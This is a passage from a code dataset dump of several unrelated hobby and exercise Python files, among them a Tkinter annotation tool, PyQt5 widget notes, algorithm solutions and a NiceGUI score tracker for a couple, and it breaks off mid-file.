now]))","repo_name":"K1A2/algorithm_python","sub_path":"baekjoon/brutedorce/18111_마인크래프트.py","file_name":"18111_마인크래프트.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38082029202","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 10 00:30:18 2019\n\n@author: sagara.co@nsit.net.in, rajat.usict.101164@ipu.ac.in\n\"\"\"\n\nimport Tkinter as tk\nimport random\nimport pickle\nimport os\nimport pandas as pd\nimport tkMessageBox as messagebox\n\nusername = \"xxx\"\nuserpart = 1\nidx = 0\nlines = 0\nflag = 0\nidxfileloc = '0'\nmax_entries = 0\nunprocessed_idxs = 0\nbucket = \"\"\nunprocessed_idx = 0\nrandarr = 0\n\n# get default path\npath = os.path.dirname(os.path.abspath(__file__))\nfileHandle = open(path + '/test.txt', 'w')\n\n# get dictionary from pickle file\npickle_file = open(path + '/data/dict.pickle','rb')\nword_dict = pickle.load(pickle_file)\n\n# window close message \ndef on_closing():\n\tif messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n\t\tfileHandle.close()\n\t\topenfile = open(idxfileloc,'w')\n\t\topenfile.write(str(max(idx,0)))\n\n\t\tdbfile = open(path + '/files/' + username + 'unprocessed.pickle','w+')\n\t\tpickle.dump(unprocessed_idxs, dbfile)\n\t\tdbfile.close()\n\n\t\tmain_window.destroy()\n\ndef on_complete():\n\tif messagebox.askokcancel(\"Annotations complete\", \"Annotations complete, Do you want to quit?\"):\n\t\tfileHandle.close()\n\t\topenfile = open(idxfileloc,'w')\n\t\topenfile.write(str(max(idx,0)))\n\t\tmain_window.destroy()\n\ndef fill_all():\n\tmessagebox.showinfo(\"Choose right\", \"You can't choose none of these, choose viable option.\")\n\treturn\n\t\t\n \ndef meaningPressCallBack(wordMeaning):\n\tr = tk.Tk()\n\tr.withdraw()\n\tr.clipboard_clear()\n\tr.clipboard_append(wordMeaning.split('-')[0])\n\tr.update() # now it stays on the clipboard after the window is closed\n\n\ndef update():\n\tglobal idx\n\tglobal lines\n\tglobal max_entries\n\tglobal bucket\n\tglobal unprocessed_idxs\n\tglobal unprocessed_idx\n\tglobal randarr\n\n\n\tif (idx>=max_entries-1 and len(unprocessed_idxs)==0 and var1.get()!=5 and var2.get()!=5):\n\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\t\ton_complete()\n\t\treturn \n\t\n\tif(flag==1):\n\t\t# add in list\n\t\tif (var1.get()==5 or var2.get()==5):\n\n\t\t\tif (bucket==\"unprocessed\"):\n\t\t\t\t# show 
pop-up\n\t\t\t\tfill_all()\n\t\t\t\treturn\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tunprocessed_idxs.append(idx)\n\t\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\n\t\telif (bucket=='unprocessed'):\n\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\t\t\tunprocessed_idxs.remove(unprocessed_idx)\n\n\n\t\telse:\n\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\t\t\n\n\t\t# choose index\n\t\tunprocessed_size = len(unprocessed_idxs)\n\t\tremanining_size = max_entries-1-idx\n\t\tif (remanining_size+unprocessed_size==0):\n\t\t\ton_complete()\n\t\trandom_idx = random.randint(1,remanining_size+unprocessed_size)\n\n\t\tif random_idx > remanining_size:\n\t\t\tbucket = 'unprocessed'\n\t\t\tunprocessed_idx = unprocessed_idxs[random_idx - remanining_size - 1]\n\t\telse:\n\t\t\tbucket = 'remanining'\n\t\t\tidx+=1\n\n\tword = [0 for x in range(4)]\n\n\tif (bucket == 'unprocessed'):\n\t\tword[0] = lines.iloc[unprocessed_idx][0]\n\t\tword[1] = lines.iloc[unprocessed_idx][1]\n\t\tword[2] = lines.iloc[unprocessed_idx][2]\n\t\tword[3] = lines.iloc[unprocessed_idx][3]\n\n\telse :\n\t\tword[0] = lines.iloc[idx][0]\n\t\tword[1] = lines.iloc[idx][1]\n\t\tword[2] = lines.iloc[idx][2]\n\t\tword[3] = lines.iloc[idx][3]\n\n\trandarr = random.sample(range(0,4),4)\n\n\tsep = '#'\n\tshow1 = word[randarr[0]].split(sep, 1)[0]\n\tshow2 = word[randarr[1]].split(sep, 1)[0]\n\tshow3 = word[randarr[2]].split(sep, 1)[0]\n\tshow4 = word[randarr[3]].split(sep, 1)[0]\n\n\tmng1 = word_dict[word[randarr[0]]]\n\tmng2 = word_dict[word[randarr[1]]]\n\tmng3 = word_dict[word[randarr[2]]]\n\tmng4 = word_dict[word[randarr[3]]]\n\n\n\tw11.config(text=show1)\n\tw12.config(text=show2)\n\tw13.config(text=show3)\n\tw14.config(text=show4)\n\t\n\tw21.config(text=show1)\n\tw22.config(text=show2)\n\tw23.config(text=show3)\n\tw24.config(text=show4)\n\t\n\tw15.config(text='none of the above')\n\tw25.config(text='none of the above')\n\t\n\tmeaning1.config(text = show1 + '- ' + mng1)\n\tmeaning2.config(text = show2 + '- ' + mng2)\n\tmeaning3.config(text = show3 + '- ' + mng3)\n\tmeaning4.config(text = show4 + '- ' + mng4)\n\n\ndef raise_frame(frame):\n\n\tglobal username\n\tglobal userpart\n\tglobal idx\n\tglobal lines\n\tglobal fileHandle\n\tglobal flag\n\tglobal idxfileloc \n\tglobal max_entries\n\tglobal unprocessed_idxs\n\t\n\t# get username and lowercase it and remove leading spaces\n\tusername = Name.get().lower().lstrip()\n\t\n\t# get selected part \n\tuserpart = var_.get()\n\tlines = pd.read_csv(path + '/data/' + 'part' + str(userpart) + '.csv', 'r', encoding = 'utf-8-sig', header = None, delimiter = '\\t')\n\tstatements = lines[1:]\n\tmax_entries = lines.shape[0]\n\n\tfileloc = path + '/files/' + username + '.txt'\n\t\n\tif (os.path.exists(fileloc) == False):\n\t\tfileHandle = open(fileloc, 'w')\n\t\tfileHandle.close()\n\t\tfileHandle = open(fileloc, 'a')\n\telse :\n\t\tfileHandle = open(fileloc, 'a')\n\t\n\t\n\t# get idx from idx file\n\tidxfileloc = path + '/files/' + username + 'idx.txt'\n\t\n\tif (os.path.exists(idxfileloc)):\n\t\tidxfile = open(idxfileloc)\n\t\tidxline = idxfile.readlines()\n\t\tidxfile.close()\n\t\tidx = int(idxline[0])\n\telse :\n\t\tidxfile = open(idxfileloc, 'w')\n\t\tidxfile.close()\n\t\tidx = 0\n\t\n\t# get unprocessed indexes data from pickle file if present\n\n\tunprocessed_idx_file = path + '/files/' + username + 
'unprocessed.pickle'\n\n\tif (os.path.exists(unprocessed_idx_file)):\n\t\tunprocessed_idx_file_pickle = open(unprocessed_idx_file,'rb')\n\t\tunprocessed_idxs = pickle.load(unprocessed_idx_file_pickle)\n\telse :\n\t\tunprocessed_idx_file_pickle = open(unprocessed_idx_file,\"wb\")\n\t\tunprocessed_idxs = []\n\n\n\n\tupdate()\n\tflag = 1\n\n\tregister_frame.destroy()\n\tmain_frame.pack()\n\tframe.tkraise()\n\t\n\n\n# main window\nmain_window = tk.Tk()\nmain_window.geometry('1080x920')\n\n# frames\nregister_frame = tk.Frame(main_window)\nmain_frame = tk.Frame(main_window)\nregister_frame.pack()\n\t\n# place label\ninfo = tk.Label(register_frame, font=(\"Courier\", 15), text = 'Write your name, \\n choose your section and then press OK')\ninfo.grid(row = 0, column = 0)\ninfo.grid_propagate(0)\n\n# place name\nvar = tk.StringVar()\nName = tk.Entry(register_frame, textvariable = var, width=20)\nName.grid(row = 0, column = 1)\n\n# choose option\nvar_ = tk.IntVar()\nop1 = tk.Radiobutton(register_frame, text='Part 1', bg = 'ivory2', value = 1, variable = var_).grid(row = 1, column = 2)\nop2 = tk.Radiobutton(register_frame, text='Part 2', bg = 'ivory2', value = 2, variable = var_).grid(row = 1, column = 3)\nop3 = tk.Radiobutton(register_frame, text='Part 3', bg = 'ivory2', value = 3, variable = var_).grid(row = 1, column = 4)\nop4 = tk.Radiobutton(register_frame, text='Part 4', bg = 'ivory2', value = 4, variable = var_).grid(row = 1, column = 5)\nop5 = tk.Radiobutton(register_frame, text='Test Part', bg = 'ivory2', value = 5, variable = var_).grid(row = 1, column = 6)\n\n#choose OK\nbutton = tk.Button(register_frame, height = 2, width = 4, text = 'OK', command = lambda: raise_frame(main_frame)).grid(row=4, column=1)\n\n\n# frames\nfrm0 = tk.Frame(main_frame, width = 480, height = 100, bd=0, bg='white')\nfrm0.grid(row = 0, column = 0, padx=(0,4), pady=(32,0))\n\nfrm01 = tk.Frame(main_frame, width = 480, height = 100, bd=0, bg='white')\nfrm01.grid(row = 0, column = 1, padx=(0,4), pady=(32,0))\n\nfrm1 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm1.grid(row = 1, column = 0, padx=(0,4), pady=(32,0))\nfrm1.grid_propagate(0)\n\nfrm2 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm2.grid(row = 1, column = 1,padx=(4,0), pady=(32,0))\nfrm2.grid_propagate(0)\n\nfrm7 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm7.grid(row = 2, column = 0, pady = (32,0))\nfrm7.grid_propagate(0)\n\nfrm8 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='white')\nfrm8.grid(row = 2, column = 1, pady=(32,0))\nfrm8.grid_propagate(0)\n\n# define labels\nlabel0 = tk.Label(frm0, font=(\"Helvetica\", 34), text = 'Please read the meanings first,')\nlabel0.place(x=10,y=10)\n\nlabel01 = tk.Label(frm01, font=(\"Helvetica\", 34), text = 'then choose.')\nlabel01.place(x=10,y=10)\n\nlabel1 = tk.Label(frm1, font=(\"Courier\", 16), text = 'Choose the most positive')\nlabel1.place(x=60,y=120)\n\nlabel2 = tk.Label(frm2, font=(\"Courier\", 16), text = 'Choose the least positive')\nlabel2.place(x=60,y=120)\n\nmeaning1 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest1',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning1['text']))\nmeaning1.pack(anchor = tk.W)\n\nmeaning2 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest2',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning2['text']))\nmeaning2.pack(anchor = tk.W)\n\nmeaning3 = tk.Button(frm7,font=(\"Courier\", 14), text = 
'meaningoftest3',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning3['text']))\nmeaning3.pack(anchor = tk.W)\n\nmeaning4 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest4',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning4['text']))\nmeaning4.pack(anchor = tk.W)\n\n# set variables\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\n\n# first radio button\nw11 = tk.Radiobutton(frm1, text='test1', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 1, variable = var1)\nw11.grid(row = 0, column = 0)\nw12 = tk.Radiobutton(frm1, text='test2', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 2, variable = var1)\nw12.grid(row = 0, column = 1)\nw13 = tk.Radiobutton(frm1, text='test3', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 3, variable = var1)\nw13.grid(row = 1, column = 0)\nw14 = tk.Radiobutton(frm1, text='test4', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 4, variable = var1)\nw14.grid(row = 1, column = 1)\nw15 = tk.Radiobutton(frm1, text='test5', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 5, variable = var1)\nw15.grid(row = 2, column = 0)\n\nw21 = tk.Radiobutton(frm2, text='test1', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 1, variable = var2)\nw21.grid(row = 0, column = 0)\nw22 = tk.Radiobutton(frm2, text='test2', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 2, variable = var2)\nw22.grid(row = 0, column = 1)\nw23 = tk.Radiobutton(frm2, text='test3', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 3, variable = var2)\nw23.grid(row = 1, column = 0)\nw24 = tk.Radiobutton(frm2, text='test4', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 4, variable = var2)\nw24.grid(row = 1, column = 1)\nw25 = tk.Radiobutton(frm2, text='test5', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 5, variable = var2)\nw25.grid(row = 2, column = 0)\n\n# next and exit buttons\nbutton = tk.Button(frm8, height = 2, width = 4, text = 'NEXT', padx=10, pady=10, command = update).pack(side = tk.LEFT)\nbutton = tk.Button(frm8, height = 2, width = 4, text = 'EXIT', padx=10, pady=10, command = on_closing).pack(side = tk.LEFT)\n\n\nmain_window.protocol(\"WM_DELETE_WINDOW\", on_closing)\nmain_window.resizable(width = True, height = True)\nmain_window.mainloop()\n\t\n\n","repo_name":"sagar-aggarwal/BWSAT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10094319549","text":"'''\nPlease implement the following in Python:\n1. Random DNA sequences (50 points total)\n(1) Randomly generate DNA sequences for 20000 samples (a DNA sequence is a random string over the four bases A, G, C, T),\nwriting them to a file named dnaData.txt in exactly this format [25 points]:\nnum00001\tAGCTC TAGTT CGGTA TAACT\nnum00002 TTAGA ……… TAGCT\nnum00003 ATAGA ………AAGAT\nnum00004 ATAGG ……… CACTT\n……………………………………………….\nnum20000 ATAGC ……… CTGAT\nGrading criteria:\n① sample numbers must be consecutive, from num00001 to num20000 (5 points)\n② each sample's DNA sequence must have length 20 (5 points)\n③ a single space is required after every 5 bases, as shown for num00001 (5 points)\n④ the base (A, G, C, T) at every position must be generated at random (5 points)\n⑤ store the data in the file in the format above (5 points)\n'''\n\ns1='ABCD'\n# import random\n# for i in range(1,501):\n#     ss=''\n#     for j in range(20):\n#         ss+=random.choice(s1)\n#     print('S'+str(i).zfill(5)+'\\t'+ss+'\\n')\n\n#print(s1.partition('C')) # split on the given separator; returns a 3-tuple: (left part, separator, right part)\n\n#print('1'.rjust(3,'0')) # return a string of the given width, right-aligned; pads with spaces by default, or with the given character\n\n#print('1'.zfill(3)) # return a string of the given width, right-aligned and left-padded with \"0\"\n\n\n\n# loop over the dictionary, counting positions that match\ndict1 = {'S00001\tCCDBCBACACADACCBADBA': 0, 
'S00002\\tAAACBCDCCDCCDDCBDADD': 0, 'S00003\\tCADADBDCDCDDDBBCABDD': 0, 'S00004\\tCBBBABAABCCBBBDDCAAA': 0, 'S00005\\tAAADDDDCBADDBBBBDADA': 0}\ns2 = 'S00002\\tAAACBCDCCDCCDDCBDADD'\nfor i in dict1.keys():\n count1=0 #计数\n for j in range(20):\n #判断比较\n print(i)\n print('i[-20:][%d]'%j,i[-20:][j])\n print('s2[-20:][%d]'%j,s2[-20:][j])\n '''\n 核心代码,先进行截取操作,截取倒数第20个至末尾,此时结果是列表;\n 然后通过下标获取该列表的对应元素,\n 例如:i= \"S00001 \tCCDBCBACACADACCBADBA\" i[-20:][0] = 'C'\n '''\n if i[-20:][j]==s2[-20:][j]:\n count1+=1\n dict1[i]=count1\nprint(dict1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jiangshangliu/pyPractice","sub_path":"for_month_exam_practice/testA.py","file_name":"testA.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24278654661","text":"import sys, os\nsys.path.append(os.getcwd())\n\nfrom hslog.liveparser import LiveLogParser\nfrom flask import Flask, request\n\nliveParser = LiveLogParser(None)\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=['POST'])\ndef hello():\n req_data = request.get_json()\n\n # feed the parser\n liveParser.flask_endpoint(req_data['line'].strip())\n return ''\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"dduric/hearthstone-experiments","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16769734689","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n\n # ser my layout\n grid = QGridLayout()\n self.setLayout(grid)\n self.setGeometry(10, 10, 300, 300) # top left x, top left y, width, height\n\n # make our widgets\n label1 = QLabel(\"label1\", self) # text to display, widget to display to\n grid.addWidget(label1, 1, 1, 1, 1) # row, col, row_span, col_span\n\n button1 = QPushButton(\"button1\", self)\n grid.addWidget(button1, 1, 2, 1, 1)\n\n lcd = QLCDNumber(self)\n lcd.display(50)\n grid.addWidget(lcd, 2, 1, 1, 2)\n\n slider = QSlider(Qt.Horizontal, self)\n slider.setValue(50)\n grid.addWidget(slider, 3, 1, 1, 2)\n\n combobox = QComboBox(self)\n grid.addWidget(combobox, 4, 1, 1, 1)\n combobox.addItems([\"Beck\", \"Nathan\", \"Olivia\"])\n\n checkbox = QCheckBox(self)\n grid.addWidget(checkbox, 4, 2, 1, 1)\n\n textline = QLineEdit(self)\n grid.addWidget(textline, 5, 1, 1, 1)\n\n multiline = QTextEdit(self)\n grid.addWidget(multiline, 5, 2, 1, 1)\n\n calender = QCalendarWidget(self)\n grid.addWidget(calender, 6, 1, 1, 1)\n\n # set up signals and slots\n button1.clicked.connect(lambda: label1.setText(\"Clicked!\"))\n slider.valueChanged.connect(lcd.display)\n checkbox.stateChanged.connect(self.box_checked)\n multiline.textChanged.connect(lambda: print(\"Changed\"))\n combobox.currentTextChanged.connect(lambda: print(combobox.currentText()))\n\n def box_checked(self):\n print(\"Box checked!\")\n\n # draw the app\n self.show()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n gui = Window() # create an instance of the window class\n sys.exit(app.exec_())","repo_name":"sturner18/ProgrammingNotes","sub_path":"pyqtnotes.py","file_name":"pyqtnotes.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1659367246","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, L = 
map(int, input().split())\nif N > 0:\n    rest_area = list(map(int, input().split()))\n    rest_area.append(0)\n    rest_area.append(L)\n    rest_area.sort()\n\n\n# if N is 0, there is no rest-area line to read.\n\n\ndef check_additional_rest_area_cnt(mid):\n    \"\"\"\n    Number of extra rest areas needed if no gap between rest areas may exceed mid\n    \"\"\"\n\n    # handle the case of zero existing rest areas separately\n    if N == 0:\n        tmp = L // mid\n        if L % mid == 0:\n            return (tmp - 1)\n        return tmp\n\n    cnt = 0\n    before_rest_area_idx = rest_area[0]\n    for i in range(1, N + 2):\n        tmp = rest_area[i] - before_rest_area_idx\n        if tmp > mid:\n            add_cnt = (tmp // mid)  # rest areas to add inside this gap\n            if before_rest_area_idx + (mid * add_cnt) == rest_area[i]:  # no need to build where one already stands\n                add_cnt -= 1\n            cnt += add_cnt  # add that many\n        before_rest_area_idx = rest_area[i]\n\n    return cnt\n\n\nleft = 0\nright = L\nmid = (left + right) // 2\nans = 1001\n\nwhile left <= right:\n    mid = (left + right) // 2  # candidate for the minimized maximum rest-area-free stretch\n    if left == 0 and right == 1:  # special-case handling for N == 0..\n        mid = 1\n    if mid <= 0:\n        break\n    tmp_cnt = check_additional_rest_area_cnt(mid)\n\n    if tmp_cnt > M:  # if more rest areas than planned would be needed\n        left = mid + 1  # allow a larger maximum gap\n\n    else:  # if the plan suffices or fewer rest areas are needed\n        right = mid - 1  # try a smaller maximum gap\n        ans = min(ans, mid)  # this mid could be the answer\n\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"김서인/2201/0131/1477.py","file_name":"1477.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9597317926","text":"from deploy.util import FormattedFile as ffile\nfrom deploy.util import img\nfrom deploy.util import repo\nfrom deploy.util import versort\n\nfrom deploy.errors import assert_file_has_content\nfrom deploy.event import Event\nfrom deploy.dlogging import L1\n\ndef get_module_info(ptr, *args, **kwargs):\n  return dict(\n    api = 5.0,\n    events = ['BaseInfoEvent'],\n    description = 'reads the .buildstamp file from the base distribution',\n  )\n\nclass BaseInfoEvent(Event):\n  def __init__(self, ptr, *args, **kwargs):\n    Event.__init__(self,\n      id = 'base-info',\n      parentid = 'installer',\n      ptr = ptr,\n      requires = ['anaconda-version', 'installer-repo'],\n      provides = ['base-info'],\n    )\n\n    self.DATA = {\n      'input': set(),\n      'output': set(),\n      'variables': set(['cvars[\\'anaconda-version\\']']),\n    }\n\n  def error(self, e):\n    Event.error(self, e)\n    try:\n      self.image.close()\n    except:\n      pass\n\n  def setup(self):\n    self.diff.setup(self.DATA)\n\n    initrd_in=( self.cvars['installer-repo'].url /\n                self.locals.L_FILES['pxeboot']['initrd.img']['path'] )\n\n    self.io.add_fpath(initrd_in, self.mddir, id='initrd.img')\n    self.initrd_out = self.io.list_output(what='initrd.img')[0]\n    self.buildstamp_out = self.mddir/'.buildstamp'\n    self.DATA['output'].add(self.buildstamp_out)\n\n  def run(self):\n    self.log(2, L1(\"reading buildstamp file from base repository\"))\n\n    # download initrd.img\n    self.io.process_files(cache=True, callback=self.link_callback,\n                          text=None, what='initrd.img')\n\n    # extract buildstamp\n    image = self.locals.L_FILES['pxeboot']['initrd.img']\n    self.image = img.MakeImage(self.initrd_out, image['format'], \n                               image.get('zipped', False), \n                               image.get('zip_format', 'gzip'))\n    self.image.open('r')\n    self.image.read('.buildstamp', self.mddir)\n    self.image.close()\n    img.cleanup()\n\n  def apply(self):\n    # parse buildstamp\n    buildstamp = ffile.DictToFormattedFile(self.locals.L_BUILDSTAMP_FORMAT)\n\n    # update base vars\n    assert_file_has_content(self.buildstamp_out)\n    self.cvars.setdefault('base-info', 
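# note: setdefault guarantees the 'base-info' dict exists before the\n        # parsed buildstamp fields are merged into it\n        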
{}).update(buildstamp.read(self.buildstamp_out))\n\n  def verify_buildstamp_file(self):\n    \"verify buildstamp file exists\"\n    self.verifier.failUnlessExists(self.buildstamp_out)\n  def verify_cvars(self):\n    \"verify cvars exist\"\n    self.verifier.failUnlessSet('base-info')\n","repo_name":"kaywilliams/rosie","sub_path":"deploy/modules/core/installer/base-info.py","file_name":"base-info.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9709622731","text":"L = list(map(int, input().split()))\r\n\r\nfor i in range(1, 10):\r\n    if L.count(i) == 3:\r\n        print(10000 + (i * 1000))\r\n        break\r\n    elif L.count(i) == 2:\r\n        print(1000 + (i * 100))\r\n        break\r\n\r\n\r\nif L[0] != L[1] and L[0] != L[2] and L[1] != L[2]:\r\n    print(max(L) * 100)","repo_name":"skh990427/Baekjoon","sub_path":"백준/Bronze/2480. 주사위 세개/주사위 세개.py","file_name":"주사위 세개.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70651264693","text":"from nicegui import ui\nfrom tinydb import TinyDB, Query\nfrom datetime import timezone, timedelta, datetime\nimport os\n\n# Get the current path\ncurrent_path = os.path.abspath(__file__)\nfather_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n# TinyDB databases\ndbPath = os.path.join(father_path, \"db.json\")\ndb = TinyDB(dbPath)\nUser = Query()\nlogDbPath = os.path.join(father_path, \"logDb.json\")\nlogDb = TinyDB(logDbPath, ensure_ascii = False)\nruleDbPath = os.path.join(father_path, \"ruleDb.json\")\nruleDb = TinyDB(ruleDbPath, ensure_ascii = False)\n\n# Dark mode\ndark = ui.dark_mode()\ndef darkModeSwitch():\n    if dark.value:\n        dark.disable()\n    else:\n        dark.enable()\n\n# Home page\nui.markdown('''#婷婷公主与他的笨蛋骑士小魏''')\nwith ui.row():\n    ui.button('快点我', on_click=lambda: ui.notify('别点我啦', close_button=\"饶过你\"))\n    ui.switch('黑暗模式', on_change=darkModeSwitch) \n    ui.spinner('dots', size='lg', color='blue')\n\n# Score table\ngrid = ui.aggrid({\n    'defaultColDef': {'flex': 1},\n    'columnDefs': [\n        {'headerName': '名字', 'field': 'name'},\n        {'headerName': '分数', 'field': 'fen'},\n        {'headerName': '愿望卷', 'field': 'ticket'},\n    ],\n    'rowData': [\n        {'name': '婷婷', 'fen': db.search(User.name == 'ztt')[0]['score'], 'ticket': db.search(User.name == 'ztt')[0]['ticket']},\n        {'name': '小魏', 'fen': db.search(User.name == 'why')[0]['score'], 'ticket': db.search(User.name == 'why')[0]['ticket']},\n    ],\n}).classes('max-h-24')\n\n# Score logging\nbeijingTime = timezone(timedelta(hours=8))\ndef logZtt(score, ticket, event):\n    zttPlus(score, ticket)\n    datetimeNow = datetime.utcnow().astimezone(beijingTime)\n    datetimeNowStr = datetimeNow.strftime(\"%Y/%m/%d-%H:%M:%S\")\n    eventZtt = \", 婷婷公主 {0}, {1}\".format(event, score)\n    logDb.insert({'time': datetimeNowStr, 'event': eventZtt})\n    log.push(datetimeNowStr+eventZtt)\ndef logWhy(score, ticket, event):\n    whyPlus(score, ticket)\n    datetimeNow = datetime.utcnow().astimezone(beijingTime)\n    datetimeNowStr = datetimeNow.strftime(\"%Y/%m/%d-%H:%M:%S\")\n    eventWhy = \", 笨蛋小魏 {0}, {1}\".format(event, score)\n    logDb.insert({'time': datetimeNowStr, 'event': eventWhy})\n    log.push(datetimeNowStr+eventWhy)\n    \n# Score update functions\ndef zttPlus(score, ticket):\n    grid.options['rowData'][0]['fen'] += score\n    db.update({'score': db.search(User.name == 'ztt')[0]['score'] + score}, User.name == 'ztt')\n    grid.options['rowData'][0]['ticket'] += ticket\n    db.update({'ticket': db.search(User.name == 'ztt')[0]['ticket'] + ticket}, 
User.name == 'ztt')\n    grid.update()\ndef whyPlus(score, ticket):\n    grid.options['rowData'][1]['fen'] += score\n    db.update({'score': db.search(User.name == 'why')[0]['score'] + score}, User.name == 'why')\n    grid.options['rowData'][1]['ticket'] += ticket\n    db.update({'ticket': db.search(User.name == 'why')[0]['ticket'] + ticket}, User.name == 'why')\n    grid.update()\n\nwith ui.row():\n    ui.button('婷婷加1', on_click=lambda: logZtt(1, 0, \"加一\"))\n    ui.button('婷婷减1', on_click=lambda: logZtt(-1, 0, \"减一\"))\n    ui.button('小魏加1', on_click=lambda: logWhy(1, 0, \"加一\"))\n    ui.button('小魏减1', on_click=lambda: logWhy(-1, 0, \"减一\"))\nwith ui.row():\n    resultZtt = ui.number(label='婷婷加减自定义分数', value=5)\n    ui.button('提交', on_click=lambda: logZtt(resultZtt.value, 0, \"自定义\"))\nwith ui.row():\n    resultWhy = ui.number(label='小魏加减自定义分数', value=5)\n    ui.button('提交', on_click=lambda: logWhy(resultWhy.value, 0, \"自定义\"))\nwith ui.grid(columns=5):\n    ui.button('好好吃饭', on_click=lambda: logZtt(2, 0, \"好好吃饭\"))\n    ui.button('早早睡觉', on_click=lambda: logZtt(2, 0, \"早早睡觉\"))\n    ui.button('好好工作', on_click=lambda: logZtt(3, 0, \"好好工作\"))\n    ui.button('陪小魏打游戏', on_click=lambda: logZtt(5, 0, \"陪小魏打游戏\"))\n    ui.button('陪小魏睡觉觉', on_click=lambda: logZtt(10, 0, \"陪小魏睡觉觉\"))\nui.separator()\n\n# Add/subtract universal wish tickets\nwith ui.row():\n    ui.button('婷婷兑换万能愿望卷', on_click=lambda: logZtt(-20, 1, \"万能愿望卷\"))\n    ui.button('小魏兑换万能愿望卷', on_click=lambda: logWhy(-20, 1, \"万能愿望卷\"))\nwith ui.row():\n    ui.button('婷婷万能愿望卷加0.5', on_click=lambda: logZtt(0, 0.5, \"万能愿望卷加0.5\"))\n    ui.button('婷婷万能愿望卷减0.5', on_click=lambda: logZtt(0, -0.5, \"万能愿望卷减0.5\"))\n    ui.button('小魏万能愿望卷加0.5', on_click=lambda: logWhy(0, 0.5, \"万能愿望卷加0.5\"))\n    ui.button('小魏万能愿望卷减0.5', on_click=lambda: logWhy(0, -0.5, \"万能愿望卷减0.5\"))\nwith ui.row():\n    zttInput = ui.input(label='婷婷使用万能愿望卷', placeholder='使用原因',\n               validation={'输入过长': lambda value: len(value) < 20})\n    ui.button('提交', on_click=lambda: logZtt(0, -1, zttInput.value))\nwith ui.row():\n    whyInput = ui.input(label='小魏使用万能愿望卷', placeholder='使用原因',\n               validation={'输入过长': lambda value: len(value) < 20})\n    ui.button('提交', on_click=lambda: logWhy(0, -1, whyInput.value))\nui.separator()\n\n# Score rules \n## Update a rule\ndef ruleUpdate(value, select):\n    ruleDb.update({'rule': value}, User.name == select)\n    ruleMark.refresh()\ndef ruleTextUpdate():\n    ruleText.value = ruleDb.search(User.name == ruleSelect.value)[0]['rule']\nwith ui.dialog() as ruleDialog, ui.card().classes('w-80 h-72'):\n    with ui.column():\n        with ui.row():\n            ruleSelect = ui.select(['婷婷公主', '笨蛋小魏', '万能愿望卷'], value='婷婷公主', on_change=lambda: ruleTextUpdate())\n            